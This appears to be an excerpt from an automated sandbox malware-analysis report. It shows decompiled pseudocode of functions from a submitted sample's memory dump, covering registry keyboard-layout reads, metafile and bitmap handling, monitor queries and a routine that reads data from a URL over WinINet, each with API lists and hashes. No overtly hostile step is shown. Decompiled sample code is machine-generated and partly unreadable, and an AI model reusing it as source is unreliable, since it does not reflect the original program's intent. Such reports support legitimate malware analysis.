                                                    0x004585df
                                                    0x004585e5
                                                    0x004585eb
                                                    0x00000000
                                                    0x004584c8
                                                    0x004584c9
                                                    0x004584d2
                                                    0x004584d5
                                                    0x004584e1
                                                    0x00000000
                                                    0x004584e7
                                                    0x004584f9
                                                    0x004584ff
                                                    0x00458529
                                                    0x00000000
                                                    0x0045852f
                                                    0x00458531
                                                    0x00458532
                                                    0x00458537
                                                    0x0045853a
                                                    0x0045853d
                                                    0x00458563
                                                    0x00458576
                                                    0x0045858e
                                                    0x0045859c
                                                    0x004585af
                                                    0x004585af
                                                    0x0045859c
                                                    0x004585b6
                                                    0x004585b9
                                                    0x004585bc
                                                    0x004585ca
                                                    0x004585ca
                                                    0x00458529
                                                    0x00000000
                                                    0x004585d2
                                                    0x004585d2
                                                    0x004585d6
                                                    0x004585d6
                                                    0x004585d6
                                                    0x00000000
                                                    0x004584d5
                                                    0x004584c2
                                                    0x00000000

                                                    APIs
                                                    • GetKeyboardLayoutList.USER32(00000040,?,00000000,0045860F,?,00000000,?,00458671,00000000,?,0043D4D3), ref: 004584BA
                                                    • RegOpenKeyExA.ADVAPI32(80000002,00000000), ref: 00458522
                                                    • RegQueryValueExA.ADVAPI32(?,layout text,00000000,00000000,?,00000100,00000000,004585CB,?,80000002,00000000), ref: 0045855C
                                                    • RegCloseKey.ADVAPI32(?,004585D2,00000000,?,00000100,00000000,004585CB,?,80000002,00000000), ref: 004585C5
                                                    Strings
                                                    • layout text, xrefs: 00458553
                                                    • System\CurrentControlSet\Control\Keyboard Layouts\%.8x, xrefs: 0045850C
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseKeyboardLayoutListOpenQueryValue
                                                    • String ID: System\CurrentControlSet\Control\Keyboard Layouts\%.8x$layout text
                                                    • API String ID: 1703357764-2652665750
                                                    • Opcode ID: 8cc75bf8530aa7b8bc3295c685c4afb19f65476633fa01bc8007fe3bd1315606
                                                    • Instruction ID: 7c903f8fd9ad85d3247752ddaabe7f8220cad0ab59f1ef766b0bf81713acb4c4
                                                    • Opcode Fuzzy Hash: 8cc75bf8530aa7b8bc3295c685c4afb19f65476633fa01bc8007fe3bd1315606
                                                    • Instruction Fuzzy Hash: 7D415174A0420DAFDB10DF55C981B9EB7F8EB48305F5140EAE904B7352DB78AE04CB69
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004288B4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 99COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 71%
                                                    			E004288B4(void* __eax, void* __edx) {
				BYTE* _v8;
				int _v12;
				struct HDC__* _v16;
				short _v18;
				signed int _v24;
				short _v26;
				short _v28;
				char _v38;
				void* __ebx;
				void* __ebp;
				signed int _t35;
				void* _t66;
				intOrPtr _t68;
				intOrPtr _t78;
				void* _t81;
				void* _t84;
				void* _t86;
				intOrPtr _t87;

				_t84 = _t86;
				_t87 = _t86 + 0xffffffdc;
				_t81 = __edx;
				_t66 = __eax;
				if( *((intOrPtr*)(__eax + 0x28)) == 0) {
					return __eax;
				} else {
					E004032B4( &_v38, 0x16);
					_t68 =  *((intOrPtr*)(_t66 + 0x28));
					_v38 = 0x9ac6cdd7;
					_t35 =  *((intOrPtr*)(_t68 + 0x18));
					if(_t35 != 0) {
						_v24 = _t35;
					} else {
						_v24 = 0x60;
					}
					_v28 = MulDiv( *(_t68 + 0xc), _v24 & 0x0000ffff, 0x9ec);
					_v26 = MulDiv( *(_t68 + 0x10), _v24 & 0x0000ffff, 0x9ec);
					_v18 = E00426DA8( &_v38);
					_v16 = GetDC(0);
					_push(_t84);
					_push(0x4289ef);
					_push( *[fs:eax]);
					 *[fs:eax] = _t87;
					_v12 = GetWinMetaFileBits( *(_t68 + 8), 0, 0, 8, _v16);
					_v8 = E0040275C(_v12);
					_push(_t84);
					_push(0x4289cf);
					_push( *[fs:eax]);
					 *[fs:eax] = _t87;
					if(GetWinMetaFileBits( *(_t68 + 8), _v12, _v8, 8, _v16) < _v12) {
						L00425FB8(_t68);
					}
					L0041D904(_t81, 0x16,  &_v38);
					L0041D904(_t81, _v12, _v8);
					_pop(_t78);
					 *[fs:eax] = _t78;
					_push(0x4289d6);
					return E0040277C(_v8);
				}
			}





















                                                    0x004288b5
                                                    0x004288b7
                                                    0x004288bc
                                                    0x004288be
                                                    0x004288c4
                                                    0x004289fb
                                                    0x004288ca
                                                    0x004288d4
                                                    0x004288d9
                                                    0x004288dc
                                                    0x004288e3
                                                    0x004288ea
                                                    0x004288f4
                                                    0x004288ec
                                                    0x004288ec
                                                    0x004288ec
                                                    0x0042890b
                                                    0x00428922
                                                    0x0042892e
                                                    0x00428939
                                                    0x0042893e
                                                    0x0042893f
                                                    0x00428944
                                                    0x00428947
                                                    0x0042895d
                                                    0x00428968
                                                    0x0042896d
                                                    0x0042896e
                                                    0x00428973
                                                    0x00428976
                                                    0x00428993
                                                    0x00428995
                                                    0x00428995
                                                    0x004289a4
                                                    0x004289b1
                                                    0x004289b8
                                                    0x004289bb
                                                    0x004289be
                                                    0x004289ce
                                                    0x004289ce

                                                    APIs
                                                    • MulDiv.KERNEL32(?,?,000009EC), ref: 00428906
                                                    • MulDiv.KERNEL32(?,?,000009EC), ref: 0042891D
                                                    • GetDC.USER32(00000000), ref: 00428934
                                                    • GetWinMetaFileBits.GDI32(?,00000000,00000000,00000008,?,00000000,004289EF,?,00000000,?,?,000009EC,?,?,000009EC), ref: 00428958
                                                    • GetWinMetaFileBits.GDI32(?,?,?,00000008,?,00000000,004289CF,?,?,00000000,00000000,00000008,?,00000000,004289EF), ref: 0042898B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: BitsFileMeta
                                                    • String ID: `
                                                    • API String ID: 858000408-2679148245
                                                    • Opcode ID: a9f53bc28096eb00c5e5236918538b4a0fd584b4a4d8f7f8bd18cc9ec4334467
                                                    • Instruction ID: f2e5e9c8815675a612d27dd2057d142453f41d2d556f4b9068e3620b80c0e0fa
                                                    • Opcode Fuzzy Hash: a9f53bc28096eb00c5e5236918538b4a0fd584b4a4d8f7f8bd18cc9ec4334467
                                                    • Instruction Fuzzy Hash: F6314575B00218ABDB01EFD5D882ABEB7B8EF4D704F50445AF904FB281D678AD40D7A9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00474FC0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 89networkfileCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 59%
                                                    			E00474FC0(void* __eax, void* __ebx, void* __edx, void* __esi) {
				void* _v8;
				void* _v12;
				long _v16;
				void _v1042;
				char _v1048;
				void* _t47;
				intOrPtr _t55;
				intOrPtr _t56;
				void* _t60;
				void* _t62;
				void* _t63;
				intOrPtr _t64;

				_t62 = _t63;
				_t64 = _t63 + 0xfffffbec;
				_v1048 = 0;
				_t47 = __edx;
				_t60 = __eax;
				_push(_t62);
				_push(0x4750fb);
				_push( *[fs:eax]);
				 *[fs:eax] = _t64;
				E004049C0(__edx);
				_v8 = InternetOpenA("MyApp", 0, 0, 0, 0);
				_push(_t62);
				_push(0x4750db);
				_push( *[fs:eax]);
				 *[fs:eax] = _t64;
				if(_v8 == 0) {
					L6:
					_pop(_t55);
					 *[fs:eax] = _t55;
					_push(0x4750e2);
					return InternetCloseHandle(_v8);
				} else {
					_v12 = InternetOpenUrlA(_v8, E00404E80(_t60), 0, 0, 0x84000000, 0);
					if(_v12 == 0) {
						goto L6;
					} else {
						_push(_t62);
						_push(0x4750bd);
						_push( *[fs:eax]);
						 *[fs:eax] = _t64;
						while(1) {
							_v16 = 0x400;
							InternetReadFile(_v12,  &_v1042, 0x400,  &_v16);
							if(_v16 == 0) {
								break;
							}
							 *((char*)(_t62 + _v16 - 0x40e)) = 0;
							E00404C30( &_v1048, 0x402,  &_v1042);
							E00404C88(_t47, _v1048);
						}
						_pop(_t56);
						 *[fs:eax] = _t56;
						_push(0x4750c4);
						return InternetCloseHandle(_v12);
					}
				}
			}















                                                    0x00474fc1
                                                    0x00474fc3
                                                    0x00474fcd
                                                    0x00474fd3
                                                    0x00474fd5
                                                    0x00474fd9
                                                    0x00474fda
                                                    0x00474fdf
                                                    0x00474fe2
                                                    0x00474fe7
                                                    0x00474ffe
                                                    0x00475003
                                                    0x00475004
                                                    0x00475009
                                                    0x0047500c
                                                    0x00475013
                                                    0x004750c4
                                                    0x004750c6
                                                    0x004750c9
                                                    0x004750cc
                                                    0x004750da
                                                    0x00475019
                                                    0x00475035
                                                    0x0047503c
                                                    0x00000000
                                                    0x00475042
                                                    0x00475044
                                                    0x00475045
                                                    0x0047504a
                                                    0x0047504d
                                                    0x00475050
                                                    0x00475050
                                                    0x0047506b
                                                    0x00475074
                                                    0x00000000
                                                    0x00000000
                                                    0x00475079
                                                    0x00475092
                                                    0x0047509f
                                                    0x0047509f
                                                    0x004750a8
                                                    0x004750ab
                                                    0x004750ae
                                                    0x004750bc
                                                    0x004750bc
                                                    0x0047503c

                                                    APIs
                                                    • InternetOpenA.WININET(MyApp,00000000,00000000,00000000,00000000), ref: 00474FF9
                                                    • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,84000000,00000000), ref: 00475030
                                                    • InternetReadFile.WININET(00000000,?,00000400,00000400), ref: 0047506B
                                                    • InternetCloseHandle.WININET(00000000), ref: 004750B7
                                                    • InternetCloseHandle.WININET(00000000), ref: 004750D5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Internet$CloseHandleOpen$FileRead
                                                    • String ID: MyApp
                                                    • API String ID: 3121278467-2115267534
                                                    • Opcode ID: 1fccfd11a45c6cc4102efae17bab0ce8ab5d7e7740f69415ac293a44f6d9b99d
                                                    • Instruction ID: 49772c5e95778878b0e4af45138c7482376825189897ce4c7807679e07b59e25
                                                    • Opcode Fuzzy Hash: 1fccfd11a45c6cc4102efae17bab0ce8ab5d7e7740f69415ac293a44f6d9b99d
                                                    • Instruction Fuzzy Hash: 2C31A7B1A04748ABE711DBA5DC12BDA77BCE748704F6184BAB704E76C0D6BC5940CA5C
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00448DC4 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 80libraryloaderCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 56%
                                                    			E00448DC4(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				void* __ecx;
				intOrPtr _t9;
				void* _t11;
				intOrPtr _t17;
				void* _t28;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t37;
				struct HINSTANCE__* _t41;
				void* _t43;
				intOrPtr _t45;
				intOrPtr _t46;

				_t45 = _t46;
				_push(__ebx);
				_t43 = __edx;
				_t28 = __eax;
				if( *0x49eba0 == 0) {
					 *0x49eba0 = L0040D9DC("comctl32.dll", __eax);
					if( *0x49eba0 >= 0x60000) {
						_t41 = GetModuleHandleA("comctl32.dll");
						if(_t41 != 0) {
							 *0x49eba4 = GetProcAddress(_t41, "ImageList_WriteEx");
						}
					}
				}
				_v8 = E00422634(_t43, 1, 0);
				_push(_t45);
				_push(0x448ebe);
				_push( *[fs:eax]);
				 *[fs:eax] = _t46;
				if( *0x49eba4 == 0) {
					_t9 = _v8;
					if(_t9 != 0) {
						_t9 = _t9 - 0xffffffec;
					}
					_push(_t9);
					_t11 = L00447D0C(_t28);
					_push(_t11);
					L0042C4AC();
					if(_t11 == 0) {
						_t33 =  *0x49d9c8; // 0x422f10
						E0040D200(_t33, 1);
						E00404378();
					}
				} else {
					_t17 = _v8;
					if(_t17 != 0) {
						_t17 = _t17 - 0xffffffec;
					}
					_push(_t17);
					_push(1);
					_push(L00447D0C(_t28));
					if( *0x49eba4() != 0) {
						_t34 =  *0x49d9c8; // 0x422f10
						E0040D200(_t34, 1);
						E00404378();
					}
				}
				_pop(_t37);
				 *[fs:eax] = _t37;
				_push(0x448ec5);
				return L00403BEC(_v8);
			}
















                                                    0x00448dc5
                                                    0x00448dc8
                                                    0x00448dcb
                                                    0x00448dcd
                                                    0x00448dd6
                                                    0x00448de2
                                                    0x00448df1
                                                    0x00448dfd
                                                    0x00448e01
                                                    0x00448e0e
                                                    0x00448e0e
                                                    0x00448e01
                                                    0x00448df1
                                                    0x00448e23
                                                    0x00448e28
                                                    0x00448e29
                                                    0x00448e2e
                                                    0x00448e31
                                                    0x00448e3b
                                                    0x00448e75
                                                    0x00448e7a
                                                    0x00448e7c
                                                    0x00448e7c
                                                    0x00448e7f
                                                    0x00448e82
                                                    0x00448e87
                                                    0x00448e88
                                                    0x00448e8f
                                                    0x00448e91
                                                    0x00448e9e
                                                    0x00448ea3
                                                    0x00448ea3
                                                    0x00448e3d
                                                    0x00448e3d
                                                    0x00448e42
                                                    0x00448e44
                                                    0x00448e44
                                                    0x00448e47
                                                    0x00448e48
                                                    0x00448e51
                                                    0x00448e5a
                                                    0x00448e5c
                                                    0x00448e69
                                                    0x00448e6e
                                                    0x00448e6e
                                                    0x00448e5a
                                                    0x00448eaa
                                                    0x00448ead
                                                    0x00448eb0
                                                    0x00448ebd

                                                    APIs
                                                      • Part of subcall function 0040D9DC: 73E714E0.VERSION(00000000,?,00000000,0040DAB2), ref: 0040DA1E
                                                      • Part of subcall function 0040D9DC: 73E714C0.VERSION(00000000,?,00000000,?,00000000,0040DA95,?,00000000,?,00000000,0040DAB2), ref: 0040DA53
                                                      • Part of subcall function 0040D9DC: 73E71500.VERSION(?,0040DAC4,?,?,00000000,?,00000000,?,00000000,0040DA95,?,00000000,?,00000000,0040DAB2), ref: 0040DA6D
                                                    • GetModuleHandleA.KERNEL32(comctl32.dll), ref: 00448DF8
                                                    • GetProcAddress.KERNEL32(00000000,ImageList_WriteEx), ref: 00448E09
                                                    • 739F1DE0.COMCTL32(00000000,?,00000000,00448EBE), ref: 00448E88
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: E714$AddressE71500HandleModuleProc
                                                    • String ID: ImageList_WriteEx$comctl32.dll$comctl32.dll
                                                    • API String ID: 314815179-3125200627
                                                    • Opcode ID: 9877ba2feab42bf383620ac1d30c79253930dce336abfba371b7d8290d564408
                                                    • Instruction ID: 78786ebc40bd40dec1c5389fa6359cb69700be1fbc3bb7ccab78b7c5a69fbc81
                                                    • Opcode Fuzzy Hash: 9877ba2feab42bf383620ac1d30c79253930dce336abfba371b7d8290d564408
                                                    • Instruction Fuzzy Hash: E3214870A04201ABE710EB7ADD56B6F36A8AB55708B60057FF805E72A2DF7DAC00D61D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0042C900 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 68stringCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 47%
                                                    			E0042C900(intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t23;
				int _t24;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t29;
				intOrPtr* _t31;

				_t29 = _a8;
				_t27 = _a4;
				if( *0x49e92d != 0) {
					_t24 = 0;
					if(_t27 == 0x12340042 && _t29 != 0 &&  *_t29 >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
						 *((intOrPtr*)(_t29 + 4)) = 0;
						 *((intOrPtr*)(_t29 + 8)) = 0;
						 *((intOrPtr*)(_t29 + 0xc)) = GetSystemMetrics(0);
						 *((intOrPtr*)(_t29 + 0x10)) = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t31 = _t29;
						 *(_t31 + 0x24) = 1;
						if( *_t31 >= 0x4c) {
							_push("DISPLAY");
							_push(_t31 + 0x28);
							L00407298();
						}
						_t24 = 1;
					}
				} else {
					_t26 =  *0x49e914; // 0x42c900
					 *0x49e914 = E0042C4FC(5, _t23, _t26, _t27, _t29);
					_t24 =  *0x49e914(_t27, _t29);
				}
				return _t24;
			}














                                                    0x0042c909
                                                    0x0042c90c
                                                    0x0042c916
                                                    0x0042c93b
                                                    0x0042c943
                                                    0x0042c963
                                                    0x0042c968
                                                    0x0042c973
                                                    0x0042c97e
                                                    0x0042c988
                                                    0x0042c989
                                                    0x0042c98a
                                                    0x0042c98b
                                                    0x0042c98c
                                                    0x0042c98d
                                                    0x0042c997
                                                    0x0042c999
                                                    0x0042c9a1
                                                    0x0042c9a2
                                                    0x0042c9a2
                                                    0x0042c9a7
                                                    0x0042c9a7
                                                    0x0042c918
                                                    0x0042c91d
                                                    0x0042c92a
                                                    0x0042c937
                                                    0x0042c937
                                                    0x0042c9b1

                                                    APIs
                                                    • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0042C958
                                                    • GetSystemMetrics.USER32 ref: 0042C96D
                                                    • GetSystemMetrics.USER32 ref: 0042C978
                                                    • lstrcpy.KERNEL32(?,DISPLAY), ref: 0042C9A2
                                                      • Part of subcall function 0042C4FC: GetProcAddress.KERNEL32(768F0000,00000000), ref: 0042C57C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: System$Metrics$AddressInfoParametersProclstrcpy
                                                    • String ID: DISPLAY$GetMonitorInfoA
                                                    • API String ID: 2545840971-1370492664
                                                    • Opcode ID: 8a9a46968513322436fba69e5700a9e92a77edf146df8e9d6d7adf034272d7b6
                                                    • Instruction ID: f52c56f8859c3bc03712ace229276911b675d95da7c00cdafe0d7f24be773c7c
                                                    • Opcode Fuzzy Hash: 8a9a46968513322436fba69e5700a9e92a77edf146df8e9d6d7adf034272d7b6
                                                    • Instruction Fuzzy Hash: 3E11B4F17017249FD720DF61AC84BABB7A8FB4A310F40493FE94597250D375A940C7AA
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0042C9D4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 68stringCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 47%
                                                    			E0042C9D4(intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t23;
				int _t24;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t29;
				intOrPtr* _t31;

				_t29 = _a8;
				_t27 = _a4;
				if( *0x49e92e != 0) {
					_t24 = 0;
					if(_t27 == 0x12340042 && _t29 != 0 &&  *_t29 >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
						 *((intOrPtr*)(_t29 + 4)) = 0;
						 *((intOrPtr*)(_t29 + 8)) = 0;
						 *((intOrPtr*)(_t29 + 0xc)) = GetSystemMetrics(0);
						 *((intOrPtr*)(_t29 + 0x10)) = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t31 = _t29;
						 *(_t31 + 0x24) = 1;
						if( *_t31 >= 0x4c) {
							_push("DISPLAY");
							_push(_t31 + 0x28);
							L00407298();
						}
						_t24 = 1;
					}
				} else {
					_t26 =  *0x49e918; // 0x42c9d4
					 *0x49e918 = E0042C4FC(6, _t23, _t26, _t27, _t29);
					_t24 =  *0x49e918(_t27, _t29);
				}
				return _t24;
			}














                                                    0x0042c9dd
                                                    0x0042c9e0
                                                    0x0042c9ea
                                                    0x0042ca0f
                                                    0x0042ca17
                                                    0x0042ca37
                                                    0x0042ca3c
                                                    0x0042ca47
                                                    0x0042ca52
                                                    0x0042ca5c
                                                    0x0042ca5d
                                                    0x0042ca5e
                                                    0x0042ca5f
                                                    0x0042ca60
                                                    0x0042ca61
                                                    0x0042ca6b
                                                    0x0042ca6d
                                                    0x0042ca75
                                                    0x0042ca76
                                                    0x0042ca76
                                                    0x0042ca7b
                                                    0x0042ca7b
                                                    0x0042c9ec
                                                    0x0042c9f1
                                                    0x0042c9fe
                                                    0x0042ca0b
                                                    0x0042ca0b
                                                    0x0042ca85

                                                    APIs
                                                    • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0042CA2C
                                                    • GetSystemMetrics.USER32 ref: 0042CA41
                                                    • GetSystemMetrics.USER32 ref: 0042CA4C
                                                    • lstrcpy.KERNEL32(?,DISPLAY), ref: 0042CA76
                                                      • Part of subcall function 0042C4FC: GetProcAddress.KERNEL32(768F0000,00000000), ref: 0042C57C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: System$Metrics$AddressInfoParametersProclstrcpy
                                                    • String ID: DISPLAY$GetMonitorInfoW
                                                    • API String ID: 2545840971-2774842281
                                                    • Opcode ID: 25480e234fa7b0967a1bf53cae06218e6be674b0b36bcbe745a1c0771c571004
                                                    • Instruction ID: da6544c83ea616b7bbcbecc7cac92abfbfd15a320570470bed168d46318f2a96
                                                    • Opcode Fuzzy Hash: 25480e234fa7b0967a1bf53cae06218e6be674b0b36bcbe745a1c0771c571004
                                                    • Instruction Fuzzy Hash: D11103B1B413289FD760CF61AC84BAFB7A8FB06310F40493BE85597290D375A944CBA8
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00428F38 Relevance: 10.6, APIs: 7, Instructions: 66COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 75%
                                                    			E00428F38(int __eax, void* __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				struct HDC__* _v12;
				struct HDC__* _v16;
				void* _v20;
				struct tagRGBQUAD _v1044;
				int _t16;
				int _t37;
				intOrPtr _t44;
				void* _t46;
				void* _t49;
				void* _t51;
				intOrPtr _t52;

				_t16 = __eax;
				_t49 = _t51;
				_t52 = _t51 + 0xfffffbf0;
				_v8 = __edx;
				_t46 = __eax;
				if(__eax == 0 ||  *((short*)(__ecx + 0x26)) > 8) {
					L4:
					return _t16;
				} else {
					_t16 = E004267F4(_v8, 0xff,  &_v1044);
					_t37 = _t16;
					if(_t37 == 0) {
						goto L4;
					} else {
						_v12 = GetDC(0);
						_v16 = CreateCompatibleDC(_v12);
						_v20 = SelectObject(_v16, _t46);
						_push(_t49);
						_push(0x428fe7);
						_push( *[fs:eax]);
						 *[fs:eax] = _t52;
						SetDIBColorTable(_v16, 0, _t37,  &_v1044);
						_pop(_t44);
						 *[fs:eax] = _t44;
						_push(0x428fee);
						SelectObject(_v16, _v20);
						DeleteDC(_v16);
						return ReleaseDC(0, _v12);
					}
				}
			}















                                                    0x00428f38
                                                    0x00428f39
                                                    0x00428f3b
                                                    0x00428f43
                                                    0x00428f46
                                                    0x00428f4a
                                                    0x00428fee
                                                    0x00428ff3
                                                    0x00428f5b
                                                    0x00428f69
                                                    0x00428f6e
                                                    0x00428f72
                                                    0x00000000
                                                    0x00428f74
                                                    0x00428f7b
                                                    0x00428f87
                                                    0x00428f94
                                                    0x00428f99
                                                    0x00428f9a
                                                    0x00428f9f
                                                    0x00428fa2
                                                    0x00428fb3
                                                    0x00428fba
                                                    0x00428fbd
                                                    0x00428fc0
                                                    0x00428fcd
                                                    0x00428fd6
                                                    0x00428fe6
                                                    0x00428fe6
                                                    0x00428f72

                                                    APIs
                                                      • Part of subcall function 004267F4: GetObjectA.GDI32(?,00000004), ref: 0042680B
                                                      • Part of subcall function 004267F4: GetPaletteEntries.GDI32(?,00000000,?,?), ref: 0042682E
                                                    • GetDC.USER32(00000000), ref: 00428F76
                                                    • CreateCompatibleDC.GDI32(?), ref: 00428F82
                                                    • SelectObject.GDI32(?), ref: 00428F8F
                                                    • SetDIBColorTable.GDI32(?,00000000,00000000,?,00000000,00428FE7,?,?,?,?,00000000), ref: 00428FB3
                                                    • SelectObject.GDI32(?,?), ref: 00428FCD
                                                    • DeleteDC.GDI32(?), ref: 00428FD6
                                                    • ReleaseDC.USER32 ref: 00428FE1
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Object$Select$ColorCompatibleCreateDeleteEntriesPaletteReleaseTable
                                                    • String ID:
                                                    • API String ID: 4046155103-0
                                                    • Opcode ID: a3d5f77fbad06867d513725d5eef4056ba0587fdc086a60eec88e5d63d0f1340
                                                    • Instruction ID: 4e07099c4c205c436fb256934ce996c76079a9fb80c20dbc0557a77875d025fb
                                                    • Opcode Fuzzy Hash: a3d5f77fbad06867d513725d5eef4056ba0587fdc086a60eec88e5d63d0f1340
                                                    • Instruction Fuzzy Hash: E8116671E052186BDB10EBE9DC41EAEB7BCEB08704F8144BAF904E7281DA789D40C765
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00458714 Relevance: 10.6, APIs: 7, Instructions: 57threadwindowCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 94%
                                                    			E00458714(long __eax, void* __ecx, short __edx) {
				struct tagPOINT _v24;
				long _t7;
				long _t12;
				long _t19;
				void* _t21;
				struct HWND__* _t27;
				short _t28;
				void* _t30;
				struct tagPOINT* _t31;

				_t21 = __ecx;
				_t7 = __eax;
				_t31 = _t30 + 0xfffffff8;
				_t28 = __edx;
				_t19 = __eax;
				if(__edx ==  *((intOrPtr*)(__eax + 0x44))) {
					L6:
					 *((intOrPtr*)(_t19 + 0x48)) =  *((intOrPtr*)(_t19 + 0x48)) + 1;
				} else {
					 *((short*)(__eax + 0x44)) = __edx;
					if(__edx != 0) {
						L5:
						_t7 = SetCursor(E004586EC(_t19, _t28));
						goto L6;
					} else {
						GetCursorPos(_t31);
						_push(_v24.y);
						_t27 = WindowFromPoint(_v24);
						if(_t27 == 0) {
							goto L5;
						} else {
							_t12 = GetWindowThreadProcessId(_t27, 0);
							if(_t12 != GetCurrentThreadId()) {
								goto L5;
							} else {
								_t7 = SendMessageA(_t27, 0x20, _t27, L004079D0(SendMessageA(_t27, 0x84, 0, L00407A64(_t31, _t21)), 0x200));
							}
						}
					}
				}
				return _t7;
			}












                                                    0x00458714
                                                    0x00458714
                                                    0x00458718
                                                    0x0045871b
                                                    0x0045871d
                                                    0x00458723
                                                    0x00458798
                                                    0x00458798
                                                    0x00458725
                                                    0x00458725
                                                    0x0045872c
                                                    0x00458788
                                                    0x00458793
                                                    0x00000000
                                                    0x0045872e
                                                    0x0045872f
                                                    0x00458734
                                                    0x00458741
                                                    0x00458745
                                                    0x00000000
                                                    0x00458747
                                                    0x0045874a
                                                    0x00458758
                                                    0x00000000
                                                    0x0045875a
                                                    0x00458781
                                                    0x00458781
                                                    0x00458758
                                                    0x00458745
                                                    0x0045872c
                                                    0x004587a1

                                                    APIs
                                                    • GetCursorPos.USER32 ref: 0045872F
                                                    • WindowFromPoint.USER32(?,?), ref: 0045873C
                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0045874A
                                                    • GetCurrentThreadId.KERNEL32 ref: 00458751
                                                    • SendMessageA.USER32(00000000,00000084,00000000,00000000), ref: 0045876A
                                                    • SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 00458781
                                                    • SetCursor.USER32(00000000), ref: 00458793
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                                                    • String ID:
                                                    • API String ID: 1770779139-0
                                                    • Opcode ID: 3b1cf324d5e8ab3e98f2e838186c1bf382b0abb02d5b530739333a6b4ef0cd78
                                                    • Instruction ID: 0e129d7b8b93cd0c48e49d674e41586019fec875b1cb266d62cfcabba037c031
                                                    • Opcode Fuzzy Hash: 3b1cf324d5e8ab3e98f2e838186c1bf382b0abb02d5b530739333a6b4ef0cd78
                                                    • Instruction Fuzzy Hash: D501AC2660830425E62036754C87F7F2558DF85B65F14453FBA04762C3ED3DAC05936E
                                                    Uniqueness

